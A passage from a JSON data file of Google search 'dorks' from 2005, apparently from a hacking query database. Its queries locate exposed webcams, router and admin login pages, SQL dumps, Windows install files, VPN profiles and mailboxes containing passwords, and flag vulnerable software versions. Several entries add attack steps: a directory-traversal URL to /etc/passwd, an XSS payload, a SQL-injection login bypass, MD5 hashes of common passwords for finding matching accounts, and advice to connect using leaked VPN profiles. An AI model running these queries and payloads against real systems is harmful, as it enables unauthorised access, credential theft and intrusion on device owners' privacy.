"2005-02-15", "request": "intitle:Linksys site:ourlinksys.com", "id": 870}, {"short description": "intitle:\"supervisioncam protocol\"", "long description": "\"SupervisionCam captures and compares images from video cameras, (internet) image files or the computer screen at intervals you define. It starts optional activities when a movement is detected.\"", "submited": "2005-02-22", "request": "intitle:\"supervisioncam protocol\"", "id": 871}, {"short description": "+\"HSTSNR\" -\"netop.com\"", "long description": "This search reveals NetOp license files. From the netop website: \"NetOp Remote Control is the most comprehensive, effective and security-conscious way to maintain your IT operations. Designed to fit into all environments, NetOp lets you access users running virtually any operating system, including Windows, Linux, Mac OS X and Solaris. Location isn't terribly important either. The program offers unrivalled connectivity, supporting all standard communication protocols. Finally, NetOp is also the ideal way to manage and administrate your servers. The system contains a sweeping range of remote management tools, all available on one easy-to-use console.\"", "submited": "2005-02-28", "request": "+\"HSTSNR\" -\"netop.com\"", "id": 872}, {"short description": "inurl:getmsg.html intitle:hotmail", "long description": "These pages contain hotmail messages that were saved as HTML. These messages can contain anything from personal data to cleartext passwords.", "submited": "2005-03-02", "request": "inurl:getmsg.html intitle:hotmail", "id": 873}, {"short description": "intext:\"Please enter correct password for Administrator Access. Thank you\" \"Copyright 2003 SMC Networks, Inc. All rights reserved.\"", "long description": "Finds SMC Routers.", "submited": "2005-02-12", "request": "intext:\"Please enter correct password for Administrator Access. Thank you\" \"Copyright 2003 SMC Networks, Inc. All rights reserved.\"", "id": 874}, {"short description": "\"delete entries\" inurl:admin/delete.asp", "long description": "As described in OSVDB article #13715:\"AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.\"The company supporting this software is no longer in business and the software is no longer being updated. Therefore, versions should not matter in this dork.", "submited": "2005-02-17", "request": "\"delete entries\" inurl:admin/delete.asp", "id": 875}, {"short description": "inurl:camctrl.cgi", "long description": "Vivotec web cams", "submited": "2005-03-05", "request": "inurl:camctrl.cgi", "id": 876}, {"short description": "allintitle:Brains, Corp. camera", "long description": "mmEye webcam / cam servermmEye is a multifunction multimedia server equipped with 32bit RISC CPU SH-3, and runs UNIX operating system (NetBSD).It has video input ports (1 S signal port, 2 composite signal ports) and PCMCIA Type II slots built in.", "submited": "2005-03-05", "request": "allintitle:Brains, Corp. camera", "id": 877}, {"short description": "\"Traffic Analysis for\" \"RMON Port * on unit *\"", "long description": "List of RMON ports produced by MRTG which is a network traffic analysis tool. See also #198", "submited": "2005-03-05", "request": "\"Traffic Analysis for\" \"RMON Port * on unit *\"", "id": 878}, {"short description": "allintitle:aspjar.com guestbook", "long description": "\"An input validation vulnerability was reported in the ASPJar guestbook. A remote user can gain administrative access and can delete guestbook messages.The '/admin/login.asp' script does not properly validate user-supplied input in the password field. A remote user can supply the following characters in password field to inject SQL commands and be authenticated as the administrator:\"' or ''='I also found another vulnerability that hasn't been documented anywhere. Using the above search to find aspjar guestbooks, appending the guestbook directory with /data/guest.mdb will give you a database containing the plaintext username and password for the guestbook admin and all entries in the guestbook, including IP addresses of users.(This company is no longer in business and the software is no longer being updated so versions shouldn't matter)", "submited": "2005-02-18", "request": "allintitle:aspjar.com guestbook", "id": 879}, {"short description": "filetype:sql (\"values * MD5\" | \"values * password\" | \"values * encrypt\")", "long description": "Locate insert statements making use of some builtin function to encrypt a password. PASSWORD(), ENCRYPT() and MD5() are searched.", "submited": "2005-02-23", "request": "filetype:sql (\"values * MD5\" | \"values * password\" | \"values * encrypt\")", "id": 880}, {"short description": "filetype:sql (&amp;quot;passwd values&amp;quot; | &amp;quot;password values&amp;quot; | &amp;quot;pass values&amp;quot; )", "long description": "Find insert statements where the field (or table name) preceding the operator VALUES will be  'password' or 'passwd' or 'pass'. The rest of the statement should contain encrypted or plaintext password.An attacker can use these files to acquire database permissions that normally would not be given to the masses.", "submited": "2005-02-23", "request": "filetype:sql (\"passwd values\" | \"password values\" | \"pass values\" )", "id": 881}, {"short description": "(inurl:81-cobalt | inurl:cgi-bin/.cobalt)", "long description": "Cobal RaQ internal pages", "submited": "2005-03-05", "request": "(inurl:81-cobalt | inurl:cgi-bin/.cobalt)", "id": 882}, {"short description": "inurl:WCP_USER", "long description": "WebConnect is client-server based software that provides secure browser based emulation to mainframe, midrange and UNIX systems", "submited": "2005-03-05", "request": "inurl:WCP_USER", "id": 883}, {"short description": "intitle:\"Dell Laser Printer\" ews", "long description": "Finds Dell's printers with EWS.EWS : Embedded Web Server technology enables the usage of a standard web browser to manage many aspects of the printer, for example, view consumable life, configure network parameters, view serial number information, printer usage etc..", "submited": "2005-03-04", "request": "intitle:\"Dell Laser Printer\" ews", "id": 884}, {"short description": "intitle:\"Kurant Corporation StoreSense\" filetype:bok", "long description": "These are Kurant StoreSense admin logon pages.", "submited": "2005-03-15", "request": "intitle:\"Kurant Corporation StoreSense\" filetype:bok", "id": 885}, {"short description": "intitle:\"active webcam page\"", "long description": "searches for \"Active Webcam\" feeds on websites, a popular USB webcam interface.", "submited": "2005-02-15", "request": "intitle:\"active webcam page\"", "id": 886}, {"short description": "\"powered by CubeCart 2.0\"", "long description": "This search reveals an alarming number of servers running versions of Brooky CubeCart that are reported to be prone to multiple vulnerabilities due to insufficient sanitization of user-supplied data....susceptible to a remote directory traversal vulnerability...cross-site scripting vulnerability may allow for theft of cookie-based authentication credentials or other attacks.An exploit is not required.The following proof of concept examples are available:http://www.example.com/index.php?&amp;language=../../../../../../../../etc/passwdhttp://www.example.com/index.php?&amp;language=var%20test_variable=31337;alert(test_variable); Vulnerability was published 2-14-2005http://www.securityfocus.com/bid/12549/", "submited": "2005-02-16", "request": "\"powered by CubeCart 2.0\"", "id": 887}, {"short description": "filetype:ora tnsnames", "long description": "This searches for tns names files.  This is an Oracle configuration file that sets up connection strings for someone's Oracle client to contact the various databases it is managing.  This file contains ports, IP's and server names of these database machines.  What I think is more telling is that in most cases, this file is stored in Oracle's installation directory which can probably be more telling.", "submited": "2005-02-15", "request": "filetype:ora tnsnames", "id": 888}, {"short description": "intitle:\"Belarc Advisor Current Profile\" intext:\"Click here for Belarc's PC Management products, for large and small companies.\"", "long description": "People who have foolishly published an audit of their machine(s) on the net with some server info as well", "submited": "2005-02-15", "request": "intitle:\"Belarc Advisor Current Profile\" intext:\"Click here for Belarc&#039;s PC Management products, for large and small companies.\"", "id": 889}, {"short description": "intitle:\"SuSE Linux Openexchange Server\" \"Please activate JavaScript!\"", "long description": "Another way to find the web administration portal of linux open exchange servers.", "submited": "2005-03-12", "request": "intitle:\"SuSE Linux Openexchange Server\" \"Please activate JavaScript!\"", "id": 890}, {"short description": "inurl:\"suse/login.pl\"", "long description": "More Suse login portals, mostly Open Exchange.", "submited": "2005-02-20", "request": "inurl:\"suse/login.pl\"", "id": 891}, {"short description": "intitle:HomeSeer.Web.Control | Home.Status.Events.Log", "long description": "HomeSeer (http://www.homeseer.com/) provides a well known home automation solution (software + hardware)This dork will find web interfaces of homeseer.", "submited": "2005-03-18", "request": "intitle:HomeSeer.Web.Control | Home.Status.Events.Log", "id": 892}, {"short description": "Powered.by.RaidenHTTPD intitle:index.of", "long description": "RaidenHTTPD ( http://www.raidenhttpd.com/en ) is a full featured web server software for Windows", "submited": "2005-03-18", "request": "Powered.by.RaidenHTTPD intitle:index.of", "id": 893}, {"short description": "filetype:ini Desktop.ini intext:mydocs.dll", "long description": "This dork finds any webshared windows folder inside my docs. You can change the end bit \"intext:mydocs.dll\" by looking inside any of your your own folders on your pc, looking for the desktop.ini file and add some of the information to the query. For Anouther example - Shell Folders (Favourite etc) filetype:ini Desktop.iniintext:shell32.dllEnjoy", "submited": "2005-02-17", "request": "filetype:ini Desktop.iniintext:mydocs.dll", "id": 894}, {"short description": "\"#mysql dump\" filetype:sql 21232f297a57a5a743894a0e4a801fc3", "long description": "this is a mod of one of the previous queries posted in here. the basic thing is, to add this:21232f297a57a5a743894a0e4a801fc3to your query, that oryginally results in a username lists with a MD5 encrypted password.this one finds mysql dumps with for a users who's passwordsare \"admin\" :)the \"21232f297a57a5a743894a0e4a801fc3\" is md5 result for \"admin\"you can try it with other queris on this site.use also:63a9f0ea7bb98050796b649e85481845 for root098f6bcd4621d373cade4e832627b4f6 for test3c3662bcb661d6de679c636744c66b62 for sexf561aaf6ef0bf14d4208bb46a4ccb3ad for xxxif you'll get lucky, you'll get a username, and a encryoted password, witch is the one above that u used.remember, that this works for all files that contain plaintex username and md5 encrypted passwords. use this techniq with other queris that you'll find hereuff... i hope i made my self clear.", "submited": "2005-02-28", "request": "\"#mysql dump\" filetype:sql 21232f297a57a5a743894a0e4a801fc3", "id": 895}, {"short description": "allinurl:wps/portal/ login", "long description": "Login to IBM WebSphere Portal.You may find portals using standard administrator user/password which gave you complete access to the application itself.", "submited": "2005-02-24", "request": "allinurl:wps/portal/ login", "id": 896}, {"short description": "intitle:asterisk.management.portal web-access", "long description": "Coalescent Systems Inc. launched The Asterisk Management Portal project to bring together best-of-breed applications to produce a \"canned\" (but fully functional) turn-key small business phone system based on The Asterisk Open Source PBX.", "submited": "2005-03-20", "request": "intitle:asterisk.management.portal web-access", "id": 897}, {"short description": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "long description": "Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time.", "submited": "2005-03-20", "request": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "id": 898}, {"short description": "ext:txt inurl:unattend.txt", "long description": "the unattend.txt is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs.", "submited": "2005-03-20", "request": "ext:txt inurl:unattend.txt", "id": 899}, {"short description": "filetype:inf sysprep", "long description": "sysprep is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs.", "submited": "2005-03-20", "request": "filetype:inf sysprep", "id": 900}, {"short description": "intitle:\"Service Managed Gateway Login\"", "long description": "service Managed Gateway from VirtualAccess login page", "submited": "2005-03-20", "request": "intitle:\"Service Managed Gateway Login\"", "id": 901}, {"short description": "\"Powered by UebiMiau\" -site:sourceforge.net", "long description": "UebiMiau is a simple, yet efficient cross-plataform POP3/IMAP mail reader written in PHP. It's have some many features, such as: Folders, View and Send Attachments, Preferences, Search, Quota Limit", "submited": "2005-03-20", "request": "\"Powered by UebiMiau\" -site:sourceforge.net", "id": 902}, {"short description": "inurl:webmail./index.pl \"Interface\"", "long description": "Webmail system which reveals that the website is hosted by vDeck", "submited": "2005-03-20", "request": "inurl:webmail./index.pl \"Interface\"", "id": 903}, {"short description": "intitle:\"BorderWare MXtreme Mail Firewall Login\"", "long description": "BorderWare MXtreme Mail firewallMXtreme is a hardened appliance with a highly robust mail transfer agent (MTA) and email gateway that prevents email-borne threats from entering your network while protecting against spam and viruses.", "submited": "2005-03-20", "request": "intitle:\"BorderWare MXtreme Mail Firewall Login\"", "id": 904}, {"short description": "intitle:\"actiontec\" main setup status \"Copyright 2001 Actiontec Electronics Inc\"", "long description": "Actiontec Routers.", "submited": "2005-03-20", "request": "intitle:\"actiontec\" main setup status \"Copyright 2001 Actiontec Electronics Inc\"", "id": 905}, {"short description": "Powered.by:.vBulletin.Version ...3.0.6", "long description": "vBulletin is reported prone to an arbitrary PHP script code execution vulnerability. The issue is reported to exist due to a lack of sufficient input sanitization performed on user-supplied data before this data is included in a dynamically generated scripthttp://www.securityfocus.com/bid/12622/info/", "submited": "2005-03-20", "request": "Powered.by:.vBulletin.Version ...3.0.6", "id": 906}, {"short description": "intitle:\"VMware Management Interface:\" inurl:\"vmware/en/\"", "long description": "VMware GSX Server is enterprise-class virtual infrastructure software for x86-based servers. It is ideal for server consolidation, disaster recovery and streamlining software development processes.", "submited": "2005-03-20", "request": "intitle:\"VMware Management Interface:\" inurl:\"vmware/en/\"", "id": 907}, {"short description": "filetype:php intitle:\"paNews v2.0b4\"", "long description": "PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script. http://www.securityfocus.com/bid/12611", "submited": "2005-03-20", "request": "filetype:php intitle:\"paNews v2.0b4\"", "id": 908}, {"short description": "\"Webthru User Login\"", "long description": "samsung webthru cameras", "submited": "2005-03-20", "request": "\"Webthru User Login\"", "id": 909}, {"short description": "ext:cgi intitle:\"control panel\" \"enter your owner password to continue!\"", "long description": "Free Perl Guestbook (FPG) administration page. Only a password is needed to logon.", "submited": "2005-03-20", "request": "ext:cgi intitle:\"control panel\" \"enter your owner password to continue!\"", "id": 910}, {"short description": "intitle:\"ListMail Login\" admin -demo", "long description": "Listmail mailinglist manager admin logon", "submited": "2005-03-20", "request": "intitle:\"ListMail Login\" admin -demo", "id": 911}, {"short description": "intitle:\"Test Page for the Apache HTTP Server on Fedora Core\" intext:\"Fedora Core Test Page\"", "long description": "Apache 2.0 on Fedore Core Test page", "submited": "2005-03-20", "request": "intitle:\"Test Page for the Apache HTTP Server on Fedora Core\" intext:\"Fedora Core Test Page\"", "id": 912}, {"short description": "\"Powered by: vBulletin Version 1.1.5\"", "long description": "This google dork reveals vulnerable message boards. It works for all Vbulletin version up to 2.0 beta 2. To try for other versions just change the version number in the dork.These vulnerable message boards allow remote code execution.More on this can be found here:http://www.securiteam.com/securitynews/5IP0B203PI.htmlit has a fairly good explanation of the exploits incorporated with these versions.", "submited": "2005-03-19", "request": "\"Powered by: vBulletin Version 1.1.5\"", "id": 913}, {"short description": "wwwboard WebAdmin  inurl:passwd.txt wwwboard|webadmin", "long description": "This is a filtered version of previous 'inurl:passwd' searches, focusing on WWWBoard [1].  There are different crypt functions involved [2], but the default username and password is 'WebAdmin:WebBoard' without the quotes.  This is my first Googledork entry, so be gentle :)Funny enough, many of the DES hashes seem to use a salt of \"ae\".  I tried just using this string along with the inurl portion, but it seemed to inappropriately restrict the search.  Couple this with [3] and, um, yeah.cykyc[1]http://www.scriptarchive.com/wwwboard.html[2]http://www.scriptarchive.com/faq/wwwboard.html#q2[3]http://johnny.ihackstuff.com/index.php?module=prodreviews&amp;func=showcontent&amp;id=625", "submited": "2005-03-28", "request": "wwwboard WebAdmin  inurl:passwd.txt wwwboard|webadmin", "id": 914}, {"short description": "intitle:asterisk.management.portal web-access", "long description": "VOXBOX Asterisk web management. Allows to manage Asterisk configuration like calls and SIP settings.", "submited": "2005-03-29", "request": "intitle:asterisk.management.portal web-access", "id": 915}, {"short description": "intitle:index.of /maildir/new/", "long description": "search gives you a mailbox dir. Contains a lot of mails.", "submited": "2005-03-26", "request": "intitle:index.of /maildir/new/", "id": 916}, {"short description": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "long description": "Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time.", "submited": "2005-03-29", "request": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "id": 917}, {"short description": "\"Powered by Coppermine Photo Gallery\" ( \"v1.2.2 b\" | \"v1.2.1\" | \"v1.2\" | \"v1.1\" | \"v1.0\")", "long description": "Reportedly Coppermine Photo Gallery is prone to multiple input validation vulnerabilities, some of which may lead to arbitrary command execution. These issues are due to the application failing to properly sanitize and validate user-supplied input prior to using it in dynamic content and system command execution function calls.These issues may be exploited to steal cookie based authentication credentials, map the application root directory of the affected application, execute arbitrary commands and include arbitrary files. Other attacks are also possible.http://www.securityfocus.com/bid/10253/", "submited": "2005-03-29", "request": "\"Powered by Coppermine Photo Gallery\" ( \"v1.2.2 b\" | \"v1.2.1\" | \"v1.2\" | \"v1.1\" | \"v1.0\")", "id": 918}, {"short description": "WebLog Referrers", "long description": "ExpressionEngine is a modular, flexible, feature-packed web publishing system that adapts to a broad range of needs.", "submited": "2005-03-30", "request": "allinurl:\"weblog/referrers\"", "id": 919}, {"short description": "inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0", "long description": "eHealth, a network management solution, enables its users to manage performance and availability of LANs, WANs, routers, Switches, Frame Relay, ATM, Remote Access Equipment, QoS, Wireless LAN, DAL, Voice and Cable technologies.", "submited": "2005-03-31", "request": "inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0", "id": 920}, {"short description": "yaws.*.server.at", "long description": "YAWS (http://yaws.hyber.org), Yet Another Web Server, is a HTTP high perfomance 1.1 webserver. Yaws is entirely written in Erlang, furthermore it is a multithreaded webserver where one Erlang light weight process is used to handle each client.", "submited": "2005-03-31", "request": "yaws.*.server.at", "id": 921}, {"short description": "intitle:\"IPC@CHIP Infopage\"", "long description": "web server detection for IPC@chip embedded webserverThe dork uses the webserver's infopage which reveals some very interesting information.See securityfocus advisory for more info: http://www.securityfocus.com/bid/2767", "submited": "2005-03-29", "request": "intitle:\"IPC@CHIP Infopage\"", "id": 922}, {"short description": "thttpd webserver", "long description": "thttpd is is a webserver written in C and should compile and run on most unix-like systems. As of version 2.20 or later, thttpd is known to build and run on the following platforms, usually on at least recent platform versions: * FreeBSD* NetBSD* BSD/OS* Solaris* Tru64 / DIGITAL UNIX / OSF/1* SunOS* Linux* HP-UX* MacOS X* UnixWare* AMIGAOS* NCR MP-RAS BASE 3.02 (EISA/MCA)* Sega Dreamcast* Compaq iPaq 3765* Windows 2000/XP (port of 2.07 only)", "submited": "2005-03-29", "request": "intitle:\"Index of *\" mode links bytes last-changed name", "id": 923}, {"short description": "intitle:endymion.sak.mail.login.page | inurl:sake.servlet", "long description": "sak Mail, servlet-based web email system, designed for scaling to large numbers of concurrent users. Intended for large universities or enterprise-level mail system", "submited": "2005-03-31", "request": "intitle:endymion.sak.mail.login.page | inurl:sake.servlet", "id": 924}, {"short description": "intitle:\"OfficeConnect Wireless 11g Access Point\" \"Checking your browser\"", "long description": "OfficeConnect Wireless 11g Access Point", "submited": "2005-04-12", "request": "intitle:\"OfficeConnect Wireless 11g Access Point\" \"Checking your browser\"", "id": 925}, {"short description": "powered.by.instaBoard.version.1.3", "long description": "InstaBoard is a coldfusion forum solution. In its version 1.3 it is vulnerable to SQL Injection.Bugtraq ID 7338", "submited": "2005-04-12", "request": "powered.by.instaBoard.version.1.3", "id": 926}, {"short description": "intitle:\"Lexmark *\" inurl:port_0", "long description": "Lexmark printers (4 models)", "submited": "2005-04-12", "request": "intitle:\"Lexmark *\" inurl:port_0", "id": 927}, {"short description": "inurl:/en/help.cgi \"ID=*\"", "long description": "Aficio printers (this search locates the help pages)", "submited": "2005-04-12", "request": "inurl:/en/help.cgi \"ID=*\"", "id": 928}, {"short description": "intitle:jdewshlp \"Welcome to the Embedded Web Server!\"", "long description": "HP Officejet help page. Remove \"help.html\" for main page.", "submited": "2005-04-12", "request": "intitle:jdewshlp \"Welcome to the Embedded Web Server!\"", "id": 929}, {"short description": "\"display printer status\" intitle:\"Home\"", "long description": "Xerox Phaser printers.", "submited": "2005-04-16", "request": "\"display printer status\" intitle:\"Home\"", "id": 930}, {"short description": "inurl:JPGLogin.htm", "long description": "webserver detection for GeoHttpServer, the page is the login page or guest cam. Don't ask why these are mostly doggy cams, weirdness.", "submited": "2005-04-12", "request": "inurl:JPGLogin.htm", "id": 931}, {"short description": "intitle:\"Welcome to Windows Small Business Server 2003\"", "long description": "Another way to find Small Business Server 2003, for more results check the dork by JimmyNeutron (id=763).", "submited": "2005-04-16", "request": "intitle:\"Welcome to Windows Small Business Server 2003\"", "id": 932}, {"short description": "intitle:\"OfficeConnect Cable/DSL Gateway\" intext:\"Checking your browser\"", "long description": "This query allows you to find OfficeConnect Cable/DSL Gateways, by locating the browser-check page that Google has indexed. The browser-check page leads to a login page, which kindly informs you of the default password.", "submited": "2005-04-16", "request": "intitle:\"OfficeConnect Cable/DSL Gateway\" intext:\"Checking your browser\"", "id": 933}, {"short description": "intext:\"Powered by phpBB 2.0.13\" inurl:\"cal_view_month.php\"|inurl:\"downloads.php\"", "long description": "phpBB 2.0.13 with installed Calendar Pro MOD are vulnerable to SQL injection attacks. An attacker can download the MD5 hashes from the account databse without authorization.", "submited": "2005-04-04", "request": "intext:\"Powered by phpBB 2.0.13\" inurl:\"cal_view_month.php\"|inurl:\"downloads.php\"", "id": 934}, {"short description": "Netscape Application Server Error page", "long description": "This error message highlights potentially unpatched or misconfigured Netscape Application Server or iPlanet application servers. An inquisitive mind would probably want to manually alter the URL's returned by this query, just to see what other, more informative messages might be revealed. As these servers are already exhibiting a misconfiguration, this could lead to other vulnerabilities being discovered.Finally, these servers are running software that is a few years old now. An attacker may feel that because of this, there's a strong possibility that they're not patched-up fully either, making them potentially vulnerable to known exploits.", "submited": "2005-04-05", "request": "intitle:\"404 SC_NOT_FOUND\"", "id": 935}, {"short description": "&amp;quot;SQL Server Driver][SQL Server]Line 1: Incorrect syntax near&amp;quot;", "long description": "you can find many servers infected with sql injection", "submited": "2005-04-07", "request": "\"[SQL Server Driver][SQL Server]Line 1: Incorrect syntax near\" -forum -thread -showthread", "id": 936}, {"short description": "intext:&amp;quot;vbulletin&amp;quot; inurl:admincp", "long description": "vBulletin Admin Control Panel", "submited": "2005-04-09", "request": "intext:\"vbulletin\" inurl:admincp", "id": 937}, {"short description": "intitle:&amp;quot;inc. vpn 3000 concentrator&amp;quot;", "long description": "This search will show the login page for Cisco VPN 3000 concentrators.  Since the default user id and password are readily available on the Cisco website, an out-of-the-box or test device could be wide open to mischief.", "submited": "2005-04-11", "request": "intitle:\"inc. vpn 3000 concentrator\"", "id": 938}, {"short description": "Winamp Web Interface", "long description": "Just a bit of fun, should reveal a few instances of a Winamp HTTP control program. Without login, you can't do much except see the currently playing track. With login you can have a bit more fun by changing the volume, currently playing track, viewing playlists, etc. With admin access you can delete tracks... I'll leave it to others to find out if anything cool can be done with this.Just a note, you *can't* hear the music the person is playing, it's not a stream interface, just a control interface.", "submited": "2005-04-11", "request": "\"About Winamp Web Interface\" intitle:\"Winamp Web Interface\"", "id": 939}, {"short description": "intitle:ilohamail intext:\"Version 0.8.10\" \"Powered by IlohaMail\"", "long description": "some version of ilohamail are vulnerable.", "submited": "2005-04-11", "request": "intitle:ilohamail intext:\"Version 0.8.10\" \"Powered by IlohaMail\"", "id": 940}, {"short description": "intitle:ilohamail \"Powered by IlohaMail\"", "long description": "IlohaMail is a light-weight yet feature rich multilingual webmail system designed for ease of use, written in pure PHP. It supports web-access to IMAP and POP3 accounts, and includes a complete contacts feature and other PIM features.", "submited": "2005-04-17", "request": "intitle:ilohamail \"Powered by IlohaMail\"", "id": 941}, {"short description": "intitle:\"NeroNET - burning online\"", "long description": "NeroNet is an online burning device by Nero. Basically with this query you'll get a listing of active servers running the software. You can only do things like view active jobs users and the see what disc the server is burning on. However if you manage to log in as the Administrator you can have a bit more fun like change the server and recording settings. Well they were smart enough to convienently place the default password located within the softwares manual.", "submited": "2005-04-20", "request": "intitle:\"NeroNET - burning online\"", "id": 942}, {"short description": "\"Parse error: parse error, unexpected T_VARIABLE\" \"on line\" filetype:php", "long description": "PHP error with a full web root path disclosure", "submited": "2005-04-26", "request": "\"Parse error: parse error, unexpected T_VARIABLE\" \"on line\" filetype:php", "id": 943}, {"short description": "\"MacHTTP\" filetype:log inurl:machttp.log", "long description": "MacHTTP is an webserver for Macs running OS 6-9.x. It's pretty good for older Macs but the default install leaves the MacHTTP.log file open to access.", "submited": "2005-04-26", "request": "\"MacHTTP\" filetype:log inurl:machttp.log", "id": 944}, {"short description": "ext:ics ics", "long description": "ICalender Fileder that can contain a lot of useful information about a possible target.", "submited": "2005-04-26", "request": "ext:ics ics", "id": 945}, {"short description": "intitle:\"Default PLESK Page\"", "long description": "Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.The default page is an indication that no configuration has been done (yet) for the domain", "submited": "2005-04-26", "request": "intitle:\"Default PLESK Page\"", "id": 946}, {"short description": "ext:plist filetype:plist inurl:bookmarks.plist", "long description": "These Safari bookmarks that might show very interesting info about a user's surfing habits", "submited": "2005-04-26", "request": "ext:plist filetype:plist inurl:bookmarks.plist", "id": 947}, {"short description": "intitle:\"Zope Help System\" inurl:HelpSys", "long description": "By itself, this returns Zope's help pages. Manipulation of the URL, changing 'HelpSys' to 'manage', gives a link to a server's Zope Management Interface. While this requires authentication, sometimes overly revealing error messages are returned.", "submited": "2005-04-27", "request": "intitle:\"Zope Help System\" inurl:HelpSys", "id": 948}, {"short description": "ext:jbf jbf", "long description": "There is a full path disclosure in .jbf files (paint shop pro), which by itself is not a vulnerability, but it becomes interesting when uploaded or used on webservers. Use a tool like 'strings' to read the ascii parts, the path is on the top of the file.", "submited": "2005-04-27", "request": "ext:jbf jbf", "id": 949}, {"short description": "\"Please use Netscape 2.0 or enhance !!\" -site:dlink.com -site:ovislink.com.tw", "long description": "A search for some HTML code used in a variety of D-link network devices (webcams and such).", "submited": "2005-04-27", "request": "\"Please use Netscape 2.0 or enhance !!\" -site:dlink.com -site:ovislink.com.tw", "id": 950}, {"short description": "intitle:\"SFXAdmin - sfx_global\" | intitle:\"SFXAdmin - sfx_local\" | intitle:\"SFXAdmin - sfx_test\"", "long description": "Just another logon page search, this one is for SFX, a link server from Ex Libris, delivers linking services in the scholarly information environment. SFX is also a component in the management of electronic resources in a library.", "submited": "2005-04-27", "request": "intitle:\"SFXAdmin - sfx_global\" | intitle:\"SFXAdmin - sfx_local\" | intitle:\"SFXAdmin - sfx_test\"", "id": 951}, {"short description": "intitle:\"Welcome to the Advanced Extranet Server, ADVX!\"", "long description": "Webserver detection: The Advanced Extranet Server project aims to create an extensible open source web server based on Apache.", "submited": "2005-04-27", "request": "intitle:\"Welcome to the Advanced Extranet Server, ADVX!\"", "id": 952}, {"short description": "inurl:cgi-bin inurl:bigate.cgi", "long description": "Anonymous surfing with bigate.cgi. Remove http:// when you copy paste or it won't work.", "submited": "2005-04-27", "request": "inurl:cgi-bin inurl:bigate.cgi", "id": 953}, {"short description": "ext:dhtml intitle:&amp;quot;document centre|(home)&amp;quot; OR intitle:&amp;quot;xerox&amp;quot;", "long description": "Various Online Devices&gt;Xerox (*Centre)", "submited": "2005-05-02", "request": "ext:dhtml intitle:\"document centre|(home)\" OR intitle:\"xerox\"", "id": 954}, {"short description": "ext:DBF DBF", "long description": "Dbase DAtabase file. Can contain sensitive data like any other database.", "submited": "2005-04-27", "request": "ext:DBF DBF", "id": 955}, {"short description": "ext:CDX CDX", "long description": "Visual FoxPro database index", "submited": "2005-04-27", "request": "ext:CDX CDX", "id": 956}, {"short description": "ext:ccm ccm -catacomb", "long description": "Lotus cc:Mail Mailbox file", "submited": "2005-04-27", "request": "ext:ccm ccm -catacomb", "id": 957}, {"short description": "ext:DCA DCA", "long description": "IBM DisplayWrite Document Content Architecture Text File", "submited": "2005-04-27", "request": "ext:DCA DCA", "id": 958}, {"short description": "intitle:\"ERROR: The requested URL could not be retrieved\" \"While trying to retrieve the URL\" \"The following error was encountered:\"", "long description": "squid error messages, most likely from reverse proxy servers.", "submited": "2005-04-27", "request": "intitle:\"ERROR: The requested URL could not be retrieved\" \"While trying to retrieve the URL\" \"The following error was encountered:\"", "id": 959}, {"short description": "!Host=*.* intext:enc_UserPassword=* ext:pcf", "long description": "some people actually keep their VPN profiles on the internet...omg... Simply donwload the pcf file, import it in your Cisco VPN client and try to connect", "submited": "2005-05-02", "request": "!Host=*.* intext:enc_UserPassword=* ext:pcf", "id": 960}, {"short description": "intitle:\"Welcome To Your WebSTAR Home Page\"", "long description": "This is the default page for the WebSTAR (Macintosh) web server (Headers say --&gt; Server: WebSTAR NetCloak).", "submited": "2005-05-02", "request": "intitle:\"Welcome To Your WebSTAR Home Page\"", "id": 961}, {"short description": "\"Powered by DWMail\" password intitle:dwmail", "long description": "What is DWmail?: DWmail is an 'intelligent' Web based email application written in the scripting language, PHP. DWmail allows you and your visitors to access, manage and send email using any POP3 or IMAP4 compliant email account. Simply enter your email address and password to check your email.", "submited": "2005-05-02", "request": "\"Powered by DWMail\" password intitle:dwmail", "id": 962}, {"short description": "inurl:gnatsweb.pl", "long description": "GNU GNATS is a set of tools for tracking bugs reported by users to a central site. It allows problem report management and communication with users via various means. GNATS stores all the information about problem reports in its databases and provides tools for querying, editing, and maintenance of the databases.", "submited": "2005-05-02", "request": "inurl:gnatsweb.pl", "id": 963}, {"short description": "intitle:\"site administration: please log in\" \"site designed by emarketsouth\"", "long description": "Real Estate software package, with the admin login screen", "submited": "2005-05-02", "request": "intitle:\"site administration: please log in\" \"site designed by emarketsouth\"", "id": 964}, {"short description": "intitle:\"YALA: Yet Another LDAP Administrator\"", "long description": "YALA is a web-based LDAP administration GUI. The idea is to simplify the directory administration with a graphical interface and neat features, though to stay a general-purpose programThe goal is to simplify the administration but not to make the YALA user stupid: to achieve this, we try to show the user what YALA does behind the scenes, what it sends to the server", "submited": "2005-05-02", "request": "intitle:\"YALA: Yet Another LDAP Administrator\"", "id": 965}, {"short description": "intitle:open-xchange inurl:login.pl", "long description": "Open-Xchange 5 is a high performance substitute for costly and inflexible Microsoft Exchange deployments -- with the full functionality of a mature collaboration platform. OX 5 will not only manage appointments and tasks, it will take care of email, calendar, contacts, to do's, projects, documents, search and forums. With OX, you can manage information using bookmarks that are linked to a wide variety of data objects, such as emails, spreadsheets and/or presentations. Open-XchangeT 5 allows you to connect to Microsoft Outlook and devices using the Palm OS. Based on proven open source technologies, OX 5 offers best-of-class security through anti-virus and anti-spam utilities.", "submited": "2005-05-02", "request": "intitle:open-xchange 